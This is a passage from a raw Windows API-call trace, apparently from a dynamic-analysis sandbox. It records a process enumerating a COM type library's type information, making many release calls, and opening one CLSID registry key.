ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.794] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd850, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.794] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd850) returned 0x0 [0030.794] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce928, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.794] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce928) returned 0x0 [0030.794] IUnknown:Release (This=0xb4cd850) returned 0x1 [0030.794] IUnknown:Release (This=0xb4ce928) returned 0x1 [0030.794] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce980) returned 0x0 [0030.794] IUnknown:Release (This=0xb4ce980) returned 0x1 [0030.794] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce9d8) returned 0x0 [0030.794] IUnknown:Release (This=0x780c608) returned 0x2 [0030.794] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce9d8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.794] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce9d8) returned 0x0 [0030.794] IUnknown:Release (This=0xb4ce9d8) returned 0x1 [0030.794] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cea30) returned 0x0 [0030.794] IUnknown:Release (This=0x780c668) returned 0x2 [0030.794] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cea30, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.794] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd900, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.794] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd900) returned 0x0 [0030.794] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce9d8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.794] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce9d8) returned 0x0 [0030.794] IUnknown:Release (This=0xb4cd900) returned 0x1 [0030.794] IUnknown:Release (This=0xb4ce9d8) returned 0x1 [0030.794] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cea30) returned 0x0 [0030.794] IUnknown:Release (This=0xb4cea30) returned 0x1 [0030.794] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cea88) returned 0x0 [0030.795] IUnknown:Release (This=0x780c6c8) returned 0x2 [0030.795] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cea88, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.795] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cea88) returned 0x0 [0030.795] IUnknown:Release (This=0xb4cea88) returned 0x1 [0030.795] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ceae0) returned 0x0 [0030.795] IUnknown:Release (This=0x780c728) returned 0x2 [0030.795] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ceae0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.795] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cda08, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.795] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cda08) returned 0x0 [0030.795] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cea88, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.795] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cea88) returned 0x0 [0030.795] IUnknown:Release (This=0xb4cda08) returned 0x1 [0030.795] IUnknown:Release (This=0xb4cea88) returned 0x1 [0030.795] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ceae0) returned 0x0 [0030.795] IUnknown:Release (This=0xb4ceae0) returned 0x1 [0030.795] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x60, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ceb38) returned 0x0 [0030.795] IUnknown:Release (This=0x780c788) returned 0x2 [0030.795] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ceb38, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.795] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ceb38) returned 0x0 [0030.795] IUnknown:Release (This=0xb4ceb38) returned 0x1 [0030.795] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x61, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ceb90) returned 0x0 [0030.796] IUnknown:Release (This=0x780c7e8) returned 0x2 [0030.796] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ceb90, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.796] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdab8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.796] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdab8) returned 0x0 [0030.796] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ceb38, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.796] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ceb38) returned 0x0 [0030.796] IUnknown:Release (This=0xb4cdab8) returned 0x1 [0030.796] IUnknown:Release (This=0xb4ceb38) returned 0x1 [0030.796] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ceb90) returned 0x0 [0030.796] IUnknown:Release (This=0xb4ceb90) returned 0x1 [0030.796] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x62, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cebe8) returned 0x0 [0030.796] IUnknown:Release (This=0x780c848) returned 0x2 [0030.796] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cebe8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.796] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cebe8) returned 0x0 [0030.796] IUnknown:Release (This=0xb4cebe8) returned 0x1 [0030.796] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x63, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cec40) returned 0x0 [0030.796] IUnknown:Release (This=0x780c8a8) returned 0x2 [0030.796] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cec40, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.797] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdb68, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.797] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdb68) returned 0x0 [0030.797] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cebe8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.797] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cebe8) returned 0x0 [0030.797] IUnknown:Release (This=0xb4cdb68) returned 0x1 [0030.797] IUnknown:Release (This=0xb4cebe8) returned 0x1 [0030.797] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cec40) returned 0x0 [0030.797] IUnknown:Release (This=0xb4cec40) returned 0x1 [0030.797] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x64, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cec98) returned 0x0 [0030.797] IUnknown:Release (This=0x780c908) returned 0x2 [0030.797] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cec98, ppTypeAttr=0x2e6a20, pDummy=0x4 | out: ppTypeAttr=0x2e6a20, pDummy=0x4) returned 0x0 [0030.797] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cec98) returned 0x0 [0030.797] IUnknown:Release (This=0xb4cec98) returned 0x1 [0030.797] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x65, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cecf0) returned 0x0 [0030.797] IUnknown:Release (This=0x780c968) returned 0x2 [0030.797] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cecf0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.797] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cecf0) returned 0x0 [0030.797] IUnknown:Release (This=0xb4cecf0) returned 0x1 [0030.797] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x66, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ced48) returned 0x0 [0030.797] IUnknown:Release (This=0x780c9c8) returned 0x2 [0030.797] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ced48, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.797] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ced48) returned 0x0 [0030.797] IUnknown:Release (This=0xb4ced48) returned 0x1 [0030.797] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x67, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ceda0) returned 0x0 [0030.798] IUnknown:Release (This=0x780ca28) returned 0x2 [0030.798] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ceda0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.798] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdc18, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.798] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdc18) returned 0x0 [0030.798] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cec98, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.798] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cec98) returned 0x0 [0030.798] IUnknown:Release (This=0xb4cdc18) returned 0x1 [0030.798] IUnknown:Release (This=0xb4cec98) returned 0x1 [0030.798] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ceda0) returned 0x0 [0030.798] IUnknown:Release (This=0xb4ceda0) returned 0x1 [0030.798] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x68, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cedf8) returned 0x0 [0030.798] IUnknown:Release (This=0x780ca88) returned 0x2 [0030.798] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cedf8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.798] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdcc8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.798] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdcc8) returned 0x0 [0030.798] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cecf0, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.798] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cecf0) returned 0x0 [0030.798] IUnknown:Release (This=0xb4cdcc8) returned 0x1 [0030.798] IUnknown:Release (This=0xb4cecf0) returned 0x1 [0030.798] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cedf8) returned 0x0 [0030.798] IUnknown:Release (This=0xb4cedf8) returned 0x1 [0030.798] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x69, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cee50) returned 0x0 [0030.799] IUnknown:Release (This=0x780cae8) returned 0x2 [0030.799] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cee50, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.799] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdd78, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.799] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdd78) returned 0x0 [0030.799] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ced48, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.799] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ced48) returned 0x0 [0030.799] IUnknown:Release (This=0xb4cdd78) returned 0x1 [0030.799] IUnknown:Release (This=0xb4ced48) returned 0x1 [0030.799] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cee50) returned 0x0 [0030.799] IUnknown:Release (This=0xb4cee50) returned 0x1 [0030.799] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ceea8) returned 0x0 [0030.799] IUnknown:Release (This=0x780cb48) returned 0x2 [0030.799] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ceea8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.799] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.799] StringFromGUID2 (in: rguid=0xb46ec38*(Data1=0xafc20920, Data2=0xda4e, Data3=0x11ce, Data4=([0]=0xb9, [1]=0x43, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x87, [7]=0xb4)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{AFC20920-DA4E-11CE-B943-00AA006887B4}") returned 39 [0030.799] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{AFC20920-DA4E-11CE-B943-00AA006887B4}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa3e) returned 0x0 [0030.799] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.800] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.800] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.800] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ceea8) returned 0x0 [0030.800] IUnknown:Release (This=0xb4ceea8) returned 0x1 [0030.800] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cef00) returned 0x0 [0030.800] IUnknown:Release (This=0x780cba8) returned 0x2 [0030.800] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cef00, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.800] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cef00) returned 0x0 [0030.800] IUnknown:Release (This=0xb4cef00) returned 0x1 [0030.800] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cef58) returned 0x0 [0030.800] IUnknown:Release (This=0x780cd28) returned 0x2 [0030.800] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cef58, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.800] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cde28, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.800] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cde28) returned 0x0 [0030.800] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cef00, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.800] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cef00) returned 0x0 [0030.800] IUnknown:Release (This=0xb4cde28) returned 0x1 [0030.801] IUnknown:Release (This=0xb4cef00) returned 0x1 [0030.801] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cef58) returned 0x0 [0030.801] IUnknown:Release (This=0xb4cef58) returned 0x1 [0030.801] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cefb0) returned 0x0 [0030.801] IUnknown:Release (This=0x780cd88) returned 0x2 [0030.801] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cefb0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.801] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cefb0) returned 0x0 [0030.801] IUnknown:Release (This=0xb4cefb0) returned 0x1 [0030.801] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf008) returned 0x0 [0030.801] IUnknown:Release (This=0x780cde8) returned 0x2 [0030.801] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf008, ppTypeAttr=0x2e6a20, pDummy=0x1f | out: ppTypeAttr=0x2e6a20, pDummy=0x1f) returned 0x0 [0030.801] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce038, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.801] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce038) returned 0x0 [0030.801] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cefb0, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.801] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cefb0) returned 0x0 [0030.801] IUnknown:Release (This=0xb4ce038) returned 0x1 [0030.801] IUnknown:Release (This=0xb4cefb0) returned 0x1 [0030.801] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf008) returned 0x0 [0030.801] IUnknown:Release (This=0xb4cf008) returned 0x1 [0030.801] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf060) returned 0x0 [0030.801] IUnknown:Release (This=0x780ce48) returned 0x2 [0030.801] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf060, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.802] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf060) returned 0x0 [0030.802] IUnknown:Release (This=0xb4cf060) returned 0x1 [0030.802] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x70, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf0b8) returned 0x0 [0030.802] IUnknown:Release (This=0x780cea8) returned 0x2 [0030.802] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf0b8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.802] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce0e8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.802] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce0e8) returned 0x0 [0030.802] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf060, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.802] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf060) returned 0x0 [0030.802] IUnknown:Release (This=0xb4ce0e8) returned 0x1 [0030.802] IUnknown:Release (This=0xb4cf060) returned 0x1 [0030.802] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf0b8) returned 0x0 [0030.802] IUnknown:Release (This=0xb4cf0b8) returned 0x1 [0030.802] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x71, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf110) returned 0x0 [0030.802] IUnknown:Release (This=0x780cf08) returned 0x2 [0030.802] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf110, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.802] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf110) returned 0x0 [0030.802] IUnknown:Release (This=0xb4cf110) returned 0x1 [0030.802] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x72, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf168) returned 0x0 [0030.802] IUnknown:Release (This=0x780cf68) returned 0x2 [0030.802] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf168, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.803] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce198, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.803] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce198) returned 0x0 [0030.803] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf110, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.803] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf110) returned 0x0 [0030.803] IUnknown:Release (This=0xb4ce198) returned 0x1 [0030.803] IUnknown:Release (This=0xb4cf110) returned 0x1 [0030.803] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf168) returned 0x0 [0030.803] IUnknown:Release (This=0xb4cf168) returned 0x1 [0030.803] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x73, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf1c0) returned 0x0 [0030.803] IUnknown:Release (This=0x780cfc8) returned 0x2 [0030.803] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf1c0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.803] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf1c0) returned 0x0 [0030.803] IUnknown:Release (This=0xb4cf1c0) returned 0x1 [0030.803] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x74, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf218) returned 0x0 [0030.803] IUnknown:Release (This=0x780d028) returned 0x2 [0030.803] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf218, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.803] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf218) returned 0x0 [0030.803] IUnknown:Release (This=0xb4cf218) returned 0x1 [0030.803] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x75, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf270) returned 0x0 [0030.803] IUnknown:Release (This=0x780d088) returned 0x2 [0030.803] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf270, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.803] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf270) returned 0x0 [0030.803] IUnknown:Release (This=0xb4cf270) returned 0x1 [0030.803] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x76, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf2c8) returned 0x0 [0030.804] IUnknown:Release (This=0x780d0e8) returned 0x2 [0030.804] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf2c8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.804] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf2c8) returned 0x0 [0030.804] IUnknown:Release (This=0xb4cf2c8) returned 0x1 [0030.804] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x77, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf320) returned 0x0 [0030.804] IUnknown:Release (This=0x780d148) returned 0x2 [0030.804] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf320, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.804] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf320) returned 0x0 [0030.804] IUnknown:Release (This=0xb4cf320) returned 0x1 [0030.804] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x78, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf378) returned 0x0 [0030.804] IUnknown:Release (This=0x780d1a8) returned 0x2 [0030.804] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf378, ppTypeAttr=0x2e6a20, pDummy=0x1a | out: ppTypeAttr=0x2e6a20, pDummy=0x1a) returned 0x0 [0030.804] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf378) returned 0x0 [0030.804] IUnknown:Release (This=0xb4cf378) returned 0x1 [0030.804] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x79, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf3d0) returned 0x0 [0030.804] IUnknown:Release (This=0x780d208) returned 0x2 [0030.804] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf3d0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.804] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf3d0) returned 0x0 [0030.804] IUnknown:Release (This=0xb4cf3d0) returned 0x1 [0030.804] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x7a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf428) returned 0x0 [0030.805] IUnknown:Release (This=0x780d268) returned 0x2 [0030.805] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf428, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.805] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf428) returned 0x0 [0030.805] IUnknown:Release (This=0xb4cf428) returned 0x1 [0030.805] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x7b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf480) returned 0x0 [0030.805] IUnknown:Release (This=0x780d2c8) returned 0x2 [0030.805] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf480, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.805] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf480) returned 0x0 [0030.805] IUnknown:Release (This=0xb4cf480) returned 0x1 [0030.805] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x7c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf4d8) returned 0x0 [0030.805] IUnknown:Release (This=0x780d328) returned 0x2 [0030.805] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf4d8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.805] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf4d8) returned 0x0 [0030.805] IUnknown:Release (This=0xb4cf4d8) returned 0x1 [0030.805] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x7d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf530) returned 0x0 [0030.805] IUnknown:Release (This=0x780d388) returned 0x2 [0030.805] 